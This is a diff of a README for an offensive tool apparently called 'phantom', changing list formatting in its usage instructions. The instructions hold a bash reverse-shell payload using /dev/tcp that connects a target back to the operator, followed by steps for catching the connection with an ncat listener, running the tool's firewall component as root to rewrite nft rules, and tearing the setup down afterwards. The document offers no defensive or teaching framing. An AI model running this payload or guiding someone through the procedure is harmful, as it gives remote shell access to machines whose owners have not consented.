konsaranto/phantom/README.md

 bash -c 'bash &>/dev/tcp/ip/1st-port 0>&1 &'
 ip and 1st-port are the ones specified above.

-Order of execution:
+## Order of execution

-a.
-Before delivering the payload:
+* Before delivering the payload:
-	1) Execute phantom-init and wait for the target to connect to your machine.
+	* Execute phantom-init and wait for the target to connect to your machine.

-b.
-After delivering the payload:
+* After delivering the payload:
-	1) Execute phantom-firewall as root, so it can modify the firewall rules.
+	* Execute phantom-firewall as root, so it can modify the firewall rules.
-	2) Create an ncat process listening at the 2nd-port. (use the -k flag to accept multiple connections)
+	* Create an ncat process listening at the 2nd-port. (use the -k flag to accept multiple connections)

-Order of closing:
+## Order of closing

 1. Close phantom-firewall and wait for some seconds so the connections can start flowing normally again.
 2. Close the ncat listening process so all the connections get closed with it.
 3: 	Execute this command: sudo phantom-firewall -r | -R. This undoes any changes to the nft ruleset made by phantom-firewall.